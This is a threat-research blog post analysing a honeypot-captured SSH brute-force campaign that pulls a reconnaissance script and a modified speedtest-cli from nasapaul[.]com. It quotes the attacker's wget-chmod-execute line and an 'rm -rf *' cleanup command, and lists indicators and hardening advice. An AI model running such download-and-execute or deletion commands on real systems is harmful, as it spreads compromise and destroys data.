NasaPaul Botnet: A Need for Speed
Last updated: 2021-09-20
Updated: 2021-02-28 - Update detection section to explain why v.py might not be flagged by AV.
Updated: 2021-03-03 - Divide article by LM Kill Chain phases instead of MITRE ATT&CK framework.
Case Summary
I collect live malware samples from honeypots running on public cloud servers. This case examines a repeated security event following a successful brute-force attack against SSH, in which the malware payloads ninfo and v.py are dropped from nasapaul[.]com. The samples examined in this post were captured on February 23rd, 2021.
Timeline
The security event described in this post was first logged at 12:22:55 UTC on 2021-02-14. The event has been captured 33 times, with the latest related security event recorded at 16:03:19 UTC on 2021-02-25. If you are interested in viewing the raw logs associated with these repeated events, they can be found in this gist.
Delivery
Before any attacker interaction is visible on the honeypot, the attacker must first brute force SSH. Successfully brute forcing the username admin and password password allows the attacker to enter commands into an emulated shell. All entered commands return an error reporting that the tool is not found (e.g. ls not found). In all instances of this repeated security event the first payload, ninfo, is seen after the attacker brute forces SSH.
Exploitation & Installation
In 31 of the 33 captured events calling home to nasapaul[.]com the attacker downloads a payload, gives it execution permissions, and then runs the payload.
wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo
Defense Evasion
A change in this behavior is observed in two security events on 2021-02-16 where the following commands are entered:
lscpu ; wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
Here, the attacker first runs lscpu and, after pulling and running ninfo, deletes all local files with rm -rf *. The rm -rf * recursively removes the files ninfo and v.py from the working directory. Subsequent attacks on 2021-02-16 and later returned to the previous command line behavior, with no file removal step.
Collection
The purpose of ninfo is to collect system information. As a reminder, the output of the script is viewed by the attacker via their SSH session. This information can then be scraped, cataloged and/or utilized. The following information is gathered by ninfo:
- CPU
- CPU core count
- CPU stepping (similar to CPU version)
- CPU bogomips (a crude speed measurement of CPU)
- GPU type
- Disk space
- Uptime
- OS type
- OS version
- OS architecture
- Root or Privileged Process Access
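The CPU items in the list above map onto the `key : value` lines of /proc/cpuinfo. As a rough illustration only (ninfo itself is a shell script; the helper name `parse_cpuinfo`, the `logical_cpus` key, and the sample text are assumptions made up for this sketch), the same fields could be extracted in Python like this:

```python
def parse_cpuinfo(text):
    """Pull a few fields out of /proc/cpuinfo-style text.

    Hypothetical helper for illustration; not taken from ninfo.
    """
    wanted = {"model name", "stepping", "bogomips"}
    info = {}
    logical_cpus = 0
    for line in text.splitlines():
        if ":" not in line:
            continue  # blank separator lines between CPU entries
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "processor":
            logical_cpus += 1  # one "processor" entry per logical CPU
        elif key in wanted and key not in info:
            info[key] = value  # keep the first occurrence only
    info["logical_cpus"] = logical_cpus
    return info


# Made-up sample in the /proc/cpuinfo layout.
SAMPLE = """processor\t: 0
model name\t: Example CPU @ 2.00GHz
stepping\t: 3
bogomips\t: 4000.00

processor\t: 1
model name\t: Example CPU @ 2.00GHz
stepping\t: 3
bogomips\t: 4000.00
"""

result = parse_cpuinfo(SAMPLE)
print(result)
```

On a real Linux host the text would come from reading /proc/cpuinfo; the sample string keeps the sketch runnable anywhere.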
Code Review
ninfo code review
Lines 4 - 19 specify the colors used during output. These values are called throughout the script and result in colored formatting of information sent to standard out.
Lines 23 - 37 set variables for requested information. The script uses the tools cut, sed, grep, head, and awk to manipulate the output of utility commands like lsb_release, free, uname, uptime, lspci, and df, and the contents of system files including /proc/cpuinfo and /proc/uptime. Using this technique the attacker is able to neatly print system information to the console in lines 55 - 63.
Lines 65 - 71 check to see if the script is running as a privileged process via the EUID or as root via UID. nu ai (Romanian for "you do not have", i.e. no root rights) is printed if not root. ai ("you have") is printed if the UID or EUID is 0, indicating the script is running as a privileged process and/or the credentials in use by the attacker are those of root.
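The check described above can be expressed in a few lines. This is a minimal Python sketch of the same logic, not the shell code from ninfo; the function name `privilege_label` is hypothetical, and only the two output strings come from the script.

```python
import os


def privilege_label(uid, euid):
    """Return 'ai' when either ID is 0 (root), otherwise 'nu ai'."""
    return "ai" if uid == 0 or euid == 0 else "nu ai"


if hasattr(os, "getuid"):  # os.getuid/os.geteuid exist on POSIX systems only
    print(privilege_label(os.getuid(), os.geteuid()))
```

Checking the effective UID as well as the real UID matters because a process started through a setuid binary can hold root privileges even when the login itself is not root.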
Next, ninfo announces speed testul incepe in 3 secunde (the speed test starts in three seconds), then echoes a countdown to standard out. In line 83 it pulls down a second payload named v.py from the nasapaul domain. In line 84 the script attempts to run that payload with perl. The following screenshot shows the output of ninfo if run without network connectivity or simulation:
Additional Details
Source IP Origin
The following information was sourced from the Talos Intelligence IP Reputation Lookup. This does not confirm an origin of attack, but rather gives us insight into the last hop on the internet. It is noted all IP addresses are owned by corporations associated with cloud hosting services.
IP | NETWORK OWNER | LOCATION |
---|---|---|
52.152.130.178 | Microsoft Corporation | Washington, United States |
64.225.101.223 | Digital Ocean | Frankfurt am Main, Germany |
167.99.253.119 | Digital Ocean | Frankfurt am Main, Germany |
167.172.24.118 | Digital Ocean | Clifton, United States |
178.62.231.95 | Digital Ocean | Amsterdam, Netherlands |
188.166.99.239 | Digital Ocean | Amsterdam, Netherlands |
188.166.124.29 | Digital Ocean | Amsterdam, Netherlands |
A whois search for these IP addresses identifies an organizational link, ORG-DOI2-RIPE, between some of the attacking IPs:
167.172.24.118/24
178.62.231.95/24
188.166.99.239/24
188.166.124.29/24
Language Indicators
An identifying characteristic of this script is that the language used is a mix of English and Romanian. Searching for drept de root, versiune, testul incepe in, and secunde via Google Translate returns a language match for Romanian.
A Google search using code from the second payload v.py returns two positive hits:
- A malware sample from a GitHub repo of malware collected by honeypots, uploaded in December 2017.
- A speedtest-cli GitHub repository pointing to the file speedtest.py from Matt Martz.
To test whether any files from GitHub user sivel are being used by the attacker, I hashed all files from the speedtest-cli GitHub repo and compared these hashes against the hash for v.py. None of the hashes match, which means that if the attacker used a file from this repository, it has since been modified. The results are shown below:
86aa0f938b6d6a3b2ba54481f1debae2 v.py
051b5371b2a098f10d8271bbfbcd8ee6 CONTRIBUTING.md
3b83ef96387f14655fc854ddc3c6bd57 LICENSE
89ba249b2bf282b2ea9c35e5fd3a197d MANIFEST.in
8192020c86e390adb168431fdbf260c1 README.rst
0566968464b829958e9bf431eb1db62f setup.cfg
2a22f34184b9275db470c39026428709 setup.py
6697b8da88cf890de4b057c0151aad2a speedtest-cli.1
322eb3ec52f028e6b1df6bd0a9f6cb52 speedtest.py
37547186527ed0466ae145073f9012d1 tox.ini
test/scripts/
51b873473209d18958a05c767723836b source.py
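A comparison like the one above can be scripted. The sketch below is one possible approach, not the commands actually used for this post: it walks a directory, computes the MD5 of every file, and reports any file whose digest equals a target hash. The function names and any directory passed in are hypothetical.

```python
import hashlib
from pathlib import Path


def md5_of(path):
    """Return the hex MD5 digest of a file, read in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_matches(target_md5, directory):
    """List files under `directory` whose MD5 equals `target_md5`."""
    return sorted(
        str(path)
        for path in Path(directory).rglob("*")
        if path.is_file() and md5_of(path) == target_md5.lower()
    )
```

Calling `find_matches` with the v.py hash listed above against a local clone of the repository would return an empty list if, as reported, no file matches. An exact-hash comparison only rules out byte-identical copies; it says nothing about how similar two files are.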
v.py code review
The file v.py is 803 lines long, substantially longer than ninfo. If you would like to examine this file for yourself it can be retrieved from this github repository. Now we can review the code in v.py in order to understand more about its behavior.
Overview in Comments
This attacker put a lot of comments into their code. We see the following statements printed to console:
1. Retrieving NasaPaul.com configuration
2. Retrieving NasaPaul.com server list
The attacker switches to Romanian (the English translation is shown):
3. Host Server is Google Cloud (Paul hides the IPs)
4. Looking for a server
5. Found a server start testing
And then they use English…
6. testing download speed
Then Romanian…
7. Download speed is XYZ Mbit/s
Then English, and then Romanian again.
8. Testing upload speed
9. The flood upload is XYZ Mbit/s
After this point the script ends and the bot logs out. Note that XYZ in this instance is a placeholder for an upload/download speed value.
Main Function
I begin by looking at the main function def main() found on lines 793 - 797. The only defined functions called here are speedtest() and print_().
def main():
    try:
        speedtest()
    except KeyboardInterrupt:
        print_('\nCancelling...')
The speedtest function is defined in the file on lines 553 - 790. We can get a sense of what the script is doing by following each call to a defined function in turn, like a choose-your-own-adventure book, instead of reading the file start to finish. You could also read it straight through to get a sense of the functions that might be called, or to see if anything looks stylistically out of place. This code review will highlight some of the code using the messages printed to the console. If you’d like to skip ahead to the next section click here.
Retrieving configuration from nasapaul[.]com
References to nasapaul[.]com are seen within speedtest() on lines 624 and 632.
The excerpt below has been pulled from lines 623 - 624. Line 623 prints Retrieving NasaPaul.com configuration... to console. This step of the python script executes regardless of internet connectivity.
if not args.simple:
    print_('\033[1;31m>>>> Retrieving \033[1;37m NasaPaul.com\033[1;m \033[1;31m configuration...')
try:
    config = getConfig()
except URLError:
    print_('Cannot retrieve speedtest configuration')
    sys.exit(1)
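In case you are wondering why the if not args.simple branch runs on each execution, note that args is set by the options parser seen in lines 568 to 604. There, --simple is defined with action='store_true', so args.simple stays False unless the flag is passed on the command line. args itself comes from options, the value returned by parser.parse_args(); when that value is a tuple, args is set to its first element. This logic is shared below: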
description = (
    'Command line interface for testing internet bandwidth using '
    'speedtest.net.\n'
    '------------------------------------------------------------'
    '--------------\n'
    'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
    parser.add_argument = parser.add_option
except AttributeError:
    pass
parser.add_argument('--bytes', dest='units', action='store_const',
                    const=('byte', 1), default=('bit', 8),
                    help='Display values in bytes instead of bits. Does '
                         'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
                    help='Generate and provide a URL to the speedtest.net '
                         'share results image')
parser.add_argument('--simple', action='store_true',
                    help='Suppress verbose output, only show basic '
                         'information')
parser.add_argument('--list', action='store_true',
                    help='Display a list of speedtest.net servers '
                         'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--timeout', default=10, type=int,
                    help='HTTP timeout in seconds. Default 10')
parser.add_argument('--secure', action='store_true',
                    help='Use HTTPS instead of HTTP when communicating '
                         'with speedtest.net operated servers')
parser.add_argument('--version', action='store_true',
                    help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
    args = options[0]
else:
    args = options
del options
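To make the flag behavior concrete, here is a small standalone sketch using the standard library argparse module. It assumes that ArgParser in v.py behaves like argparse.ArgumentParser for this option; only the --simple definition is reproduced.

```python
import argparse

# Standalone parser with just the one flag of interest.
parser = argparse.ArgumentParser()
parser.add_argument('--simple', action='store_true')

default_args = parser.parse_args([])           # no flags supplied
simple_args = parser.parse_args(['--simple'])  # flag supplied

print(default_args.simple)  # False, so `if not args.simple` is taken
print(simple_args.simple)   # True, so the verbose messages are skipped
```

With no flags supplied, every `if not args.simple:` block in speedtest() runs, which is consistent with the NasaPaul.com messages being printed on each execution.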
Returning to the first block of code, after Retrieving NasaPaul.com configuration... is printed to console, on line 626 we see a call to getConfig(). This function, seen in lines 376 - 414, is shared below:
def getConfig():
    """Download the speedtest.net configuration and return only the data
    we are interested in
    """
    request = build_request('://www.speedtest.net/speedtest-config.php')
    uh, e = catch_request(request)
    if e:
        print_('Could not retrieve speedtest.net configuration: %s' % e)
        sys.exit(1)
    configxml = []
    while 1:
        configxml.append(uh.read(10240))
        if len(configxml[-1]) == 0:
            break
    if int(uh.code) != 200:
        return None
    uh.close()
    try:
        try:
            root = ET.fromstring(''.encode().join(configxml))
            config = {
                'client': root.find('client').attrib,
                'times': root.find('times').attrib,
                'download': root.find('download').attrib,
                'upload': root.find('upload').attrib}
        except AttributeError:  # Python3 branch
            root = DOM.parseString(''.join(configxml))
            config = {
                'client': getAttributesByTagName(root, 'client'),
                'times': getAttributesByTagName(root, 'times'),
                'download': getAttributesByTagName(root, 'download'),
                'upload': getAttributesByTagName(root, 'upload')}
    except SyntaxError:
        print_('Failed to parse speedtest.net configuration')
        sys.exit(1)
    del root
    del configxml
    return config
In the function snippet below, pulled from getConfig() above, a request is built using build_request for speedtest.net. build_request “build[s] a urllib2 request object to automatically add a user-agent header to all requests” for a url.
request = build_request('://www.speedtest.net/speedtest-config.php')
uh, e = catch_request(request)
Following the creation of request, catch_request is called. It is described as “a helper function to catch common exceptions when establishing a connection with a HTTP/S request.” The result of catch_request(request) and any resulting error are stored in variables uh and e respectively. If an error is stored in variable e, the script prints a message and exits with status 1:
if e:
    print_('Could not retrieve speedtest.net configuration: %s' % e)
    sys.exit(1)
On lines 386 - 393 of the getConfig() function a variable configxml of type list is created. The response from www.speedtest.net/speedtest-config.php, held in variable uh, is read in chunks of up to 10240 bytes and each chunk is appended to configxml. configxml[-1] points to the last value in the list configxml. If the length of this value is zero, the response has been fully read and the while loop breaks. If the status code of the response from speedtest.net is anything other than 200 (OK), then None is returned from getConfig().
configxml = []
while 1:
    configxml.append(uh.read(10240))
    if len(configxml[-1]) == 0:
        break
if int(uh.code) != 200:
    return None
uh.close()
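The read loop above is a common pattern: keep reading fixed-size chunks until an empty read signals the end of the stream. The following sketch reproduces that pattern against an in-memory stream so it can be run without network access; the helper name `read_all` is hypothetical and io.BytesIO stands in for the HTTP response object.

```python
import io


def read_all(stream, chunk_size=10240):
    """Read a stream in chunks until an empty chunk is returned."""
    chunks = []
    while True:
        chunks.append(stream.read(chunk_size))
        if len(chunks[-1]) == 0:  # empty read: nothing left to consume
            break
    return b"".join(chunks)


# 25000 bytes takes three non-empty reads plus one empty read.
body = read_all(io.BytesIO(b"x" * 25000))
print(len(body))
```

As in getConfig(), the final empty chunk is appended before the loop breaks; it is harmless because joining an empty bytes object adds nothing.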
While the message printed to console reads “Retrieving NasaPaul.com configuration”, this behavior was not confirmed in the python script. Only communication to www.speedtest.net/speedtest-config.php was observed.
Retrieving nasapaul Server List
Lines 631 - 644 handle commands related to the Retrieving NasaPaul[.]com server list... message printed to console:
if not args.simple:
    print_('\033[1;31m>>>> Retrieving \033[1;37m NasaPaul.com\033[1;m \033[1;31m server list...')
if args.list or args.server:
    servers = closestServers(config['client'], True)
    if args.list:
        serverList = []
        for server in servers:
            line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
                    '[%(d)0.2f km]' % server)
            serverList.append(line)
        print_('\n'.join(serverList).encode('utf-8', 'ignore'))
        sys.exit(0)
else:
    servers = closestServers(config['client'])
We want to look at the closestServers functions to get a better idea of what servers are being used in this block of code. If you want to review these functions briefly check out this gist.
Looking at the closestServers() definition, the urls in use are:
urls = [
    '://www.speedtest.net/speedtest-servers-static.php',
    '://c.speedtest.net/speedtest-servers-static.php',
    '://www.speedtest.net/speedtest-servers.php',
    '://c.speedtest.net/speedtest-servers.php',
]
Similar to what we’ve seen previously in getConfig(), we see calls out to the listed urls using build_request and catch_request:
for url in urls:
    try:
        request = build_request(url)
        uh, e = catch_request(request)
        if e:
            errors.append('%s' % e)
            raise SpeedtestCliServerListError
        serversxml = []
        while 1:
            serversxml.append(uh.read(10240))
            if len(serversxml[-1]) == 0:
                break
        if int(uh.code) != 200:
            uh.close()
            raise SpeedtestCliServerListError
        uh.close()
While the message printed to console reads Retrieving NasaPaul.com server list, this behavior was not confirmed in the python script. Instead, calls to speedtest.net are seen.
Host Server is Google Cloud (Paul hides the IPs)
On lines 645 and 648 a print_ statement prints out Server Hostat De (Server Hosted By) and Paul ascunde IPu (Paul hides the IP).
if not args.simple:
    print_('\033[1;31m>>>> Server Hostat De \033[1;m \033[1;37m%(isp)s\033[1;m (\033[1;37mPaul ascunde IPu\033[1;m)\033[1;37m...' % config['client'])
This part of the script prints the ISP in use to console, but no evidence of “hiding IPs” was found in the python script.
Looking for and Finding a Server
As with the previous message, the strings Cautam ce-l mai bun server (We are looking for the best server) and Server Gasit incepem Testele (Server found, tests are started) are printed to console prior to a call to getBestServer().
if not args.simple:
    print_('\033[1;31m>>>> Cautam ce-l mai bun server \033[1;m')
    print_('\033[1;31m>>>> Server Gasit incepem Testele \033[1;m')
best = getBestServer(servers)
The function getBestServer() is defined on lines 498 - 534:
def getBestServer(servers):
    """Perform a speedtest.net latency request to determine which
    speedtest.net server has the lowest latency
    """
    results = {}
    for server in servers:
        cum = []
        url = '%s/latency.txt' % os.path.dirname(server['url'])
        urlparts = urlparse(url)
        for i in range(0, 3):
            try:
                if urlparts[0] == 'https':
                    h = HTTPSConnection(urlparts[1])
                else:
                    h = HTTPConnection(urlparts[1])
                headers = {'User-Agent': user_agent}
                start = timeit.default_timer()
                h.request("GET", urlparts[2], headers=headers)
                r = h.getresponse()
                total = (timeit.default_timer() - start)
            except (HTTPError, URLError, socket.error):
                cum.append(3600)
                continue
            text = r.read(9)
            if int(r.status) == 200 and text == 'test=test'.encode():
                cum.append(total)
            else:
                cum.append(3600)
            h.close()
        avg = round((sum(cum) / 6) * 1000, 3)
        results[avg] = server
    fastest = sorted(results.keys())[0]
    best = results[fastest]
    best['latency'] = fastest
    return best
In this function, the passed variable servers has been set in lines 634 or 644 via a call to closestServers() using output created from the getConfig() function, discussed in the previous sections. I found no evidence to suggest that any servers related to nasapaul[.]com were queried.
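The selection logic in getBestServer() boils down to scoring each server by its summed request times and keeping the lowest score. The sketch below isolates that arithmetic with made-up timings; the function names and server labels are hypothetical. It keeps the divisor of 6 from the listing even though only three requests are made per server, so the reported figure is half the true mean. The ranking is unaffected because every server is scaled the same way.

```python
def average_latency_ms(samples, divisor=6):
    """Score a server as in the listing: sum / 6, converted to ms."""
    return round((sum(samples) / divisor) * 1000, 3)


def pick_best(latencies):
    """latencies maps a server label to a list of request times in seconds."""
    # As in the original, servers with identical scores overwrite each other.
    scored = {average_latency_ms(s): name for name, s in latencies.items()}
    return scored[min(scored)]


timings = {
    "server-a": [0.030, 0.030, 0.030],
    "server-b": [0.010, 0.010, 3600],  # 3600 is the penalty for a failed request
}
print(pick_best(timings))
```

A single failed request adds a 3600-second penalty, which effectively removes that server from contention regardless of how fast its other responses were.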
Testing Download and Upload Speeds
Finally, the download and upload speeds are collected using functions downloadSpeed() and uploadSpeed().
if not args.simple:
    print_(('\033[1;31m>>>> Server Intretinut de \033[1;37m%(sponsor)s\033[1;m (\033[1;37m%(name)s\033[1;m) \033[1;m[\033[1;37m%(d)0.2f km\033[1;m]\033[1;37m:\033[1;37m '
            '%(latency)s ms\033[1;31m' % best).encode('utf-8', 'ignore'))
else:
    print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
    for i in range(0, 4):
        urls.append('%s/random%sx%s.jpg' %
                    (os.path.dirname(best['url']), size, size))
if not args.simple:
    print_('>>>> Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
    print_()
print_('>>>> Download-ul este de : \033[1;37m%0.2f M%s/s' %
       ((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
    for i in range(0, 25):
        sizes.append(size)
if not args.simple:
    print_('\033[1;31m>>>> Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
    print_()
print_('>>>> Upload-ul de flood este : \033[1;37m%0.2f M%s/s\033[1;31m' %
       ((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
if args.share and args.mini:
    print_('Cannot generate a speedtest.net share results image while '
           'testing against a Speedtest Mini server')
elif args.share:
    dlspeedk = int(round((dlspeed / 1000) * 8, 0))
    ping = int(round(best['latency'], 0))
    ulspeedk = int(round((ulspeed / 1000) * 8, 0))
The downloadSpeed() and uploadSpeed() functions launch FileGetter and FilePutter threads, respectively, to calculate download/upload speeds. Nothing in these functions appeared malicious, nor did they redirect to a malicious url.
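The figures printed to the attacker are produced by a simple unit conversion. The sketch below reproduces the formatting expression from the listing, assuming the measured value is in bytes per second (which the multiply-by-8 default of ('bit', 8) implies); the function name `format_speed` and the input value are made up for illustration.

```python
def format_speed(bytes_per_second, units=('bit', 8)):
    """Format a raw speed the way the listing does: M<unit>/s."""
    return '%0.2f M%s/s' % (
        (bytes_per_second / 1000 / 1000) * units[1], units[0])


# 12,500,000 bytes/s is 12.5 megabytes/s, or 100 megabits/s.
print(format_speed(12500000))               # 100.00 Mbit/s
print(format_speed(12500000, ('byte', 1)))  # 12.50 Mbyte/s
```

The conversion uses decimal megabits (divide by 1000 twice), not binary mebibits.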
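It is noted, however, that the results of the speed test can be sent to speedtest[.]net. In the excerpt above, the variables this request depends on (dlspeedk, ping, ulspeedk) are only set in the elif args.share: branch, so the submission appears to require the --share option. This code is shown below: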
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
    'download=%s' % dlspeedk,
    'ping=%s' % ping,
    'upload=%s' % ulspeedk,
    'promo=',
    'startmode=%s' % 'pingselect',
    'recommendedserverid=%s' % best['id'],
    'accuracy=%s' % 1,
    'serverid=%s' % best['id'],
    'hash=%s' % md5(('%s-%s-%s-%s' %
                     (ping, ulspeedk, dlspeedk, '297aae72'))
                    .encode()).hexdigest()]
headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
request = build_request('://www.speedtest.net/api/api.php',
                        data='&'.join(apiData).encode(),
                        headers=headers)
f, e = catch_request(request)
if e:
    print_('Could not submit results to speedtest.net: %s' % e)
    sys.exit(1)
response = f.read()
code = f.code
f.close()
In an effort to be clear, I will repeat that speedtest.net is the only domain used in the v.py script aside from the nasapaul[.]com references printed to console using print_(). All network related communication in the v.py script appears limited to speedtest.net.
Impact
Successful execution of ninfo discloses information about the system, including the hardware or virtualized hardware specifications described in the Collection section above and the level of privilege associated with the compromised login. Successful execution of v.py discloses the system’s bandwidth. This information is relayed to the attacker via the SSH session. Typically, collections of this type are stored and reused by the original attacker, or they could be sold on a criminal network for use in a DDoS-for-hire (DDoSaaS) offering.
All of these attacks originated from successful brute-force attempts against SSH. There are a few strategies you can use to protect against SSH attacks. You could move the SSH port to a non-default port (e.g. from port 22 to port 43895). This will sidestep some automated attacks, but it is a weak control because the new SSH port can be identified with a simple nmap scan. A more effective way to protect against SSH attacks would be to authenticate using an SSH key or certificate-based authentication. To pair with this control, you should modify the global SSH server configuration file (/etc/ssh/sshd_config) to disable password authentication. You could also use a service like fail2ban to put IPs with repeated failed SSH authentication attempts on a denylist. For example, if an IP address fails to authenticate 10 times in a row, fail2ban would jail the IP, effectively preventing it from logging in over SSH for a period of time.
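One way to audit the password-authentication control is to check the server configuration text for the PasswordAuthentication keyword. The sketch below is a simplified illustration with a hypothetical function name: it relies on OpenSSH using the first value it finds for a keyword, treats an unset keyword as passwords allowed, and deliberately ignores Match blocks and Include files, which a real audit would need to handle.

```python
def password_auth_disabled(config_text):
    """Return True if the first global PasswordAuthentication value is 'no'."""
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue  # skip blanks and comments
        parts = line.split(None, 1)
        keyword = parts[0].lower()  # keywords are case-insensitive
        if keyword == 'match':
            break  # conditional blocks are out of scope for this sketch
        if keyword == 'passwordauthentication' and len(parts) == 2:
            return parts[1].strip().lower() == 'no'
    return False  # unset: treated here as password logins allowed


sample = """# example server configuration text
Port 22
PasswordAuthentication no
PubkeyAuthentication yes
"""
print(password_auth_disabled(sample))
```

On a live system, running `sshd -T` as root prints the effective configuration and is a more reliable source than parsing the file by hand.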
Unanswered Questions & Opinions
In my opinion these security events may be the result of a botnet looking for victim hosts to utilize as a part of a DDoS network and/or to be used to serve and collect information about other vulnerable hosts. I have reached this conclusion because the commands seen in the repeated security event are limited to collecting information related to computer specifications and bandwidth. Another potential explanation could be that the botnet is searching for victims to mine cryptocurrency. Without further information, these conclusions are purely speculative.
There are a few questions left over from this case that I am still asking myself. Foremost in my mind is seeing a python script run with perl. I could see perl being remapped to a python binary, but this behavior was not seen in ninfo. How does that work? Is the #!/usr/bin/env python on line 1 of the file enough for the interpreter to know to use python instead of perl? If I learn anything new related to this event I’ll update and mark the date at the top of this post and/or link to more information.
Detections
When scanned with ClamAV, no detections are seen yet:
When I first uploaded ninfo to VirusTotal on 2021-02-23 it had 1/64 antivirus detections. Since then, the number has increased to 6/64.
v.py remains undetected as of 2021-02-27. This is not surprising since the script is a bandwidth test that reaches out to a known good site, Speedtest by Ookla. Whether the script is malicious is open to debate; however, because this specific copy of v.py is used in the context of data collection, I would flag the hash.
Network
The following IP addresses were associated with one or more successful SSH brute force attacks.
52.152.130.178
64.225.101.223
167.99.253.119
167.172.24.118
178.62.231.95
188.166.99.239
188.166.124.29
DNS
The following hostnames were associated with one or more of the security events described in this post.
nasapaul[.]com
wpmudev[.]host
File Hashes
md5sum
678af2ec3251f8692c9324ffe64c198a ninfo
86aa0f938b6d6a3b2ba54481f1debae2 v.py
sha256sum
19778a62055770a9e5f890e52227ccd39251bf23045c15383411638540ceabf7 ninfo
00e430b733cf199747c9c6e0f2e2fae6a045bbed9c0f0f993112b301fcdf5dbc v.py
MITRE ATT&CK Techniques
- T1595 Active Scanning: Scanning IP Blocks
- T1110 Brute Force
- T1190 Exploit Public-Facing Application
- T1078 Valid Accounts: Local Accounts
- T1119 Automated Collection
- T1059 Command and Scripting Interpreter
- T1070 Indicator Removal on Host: File Deletion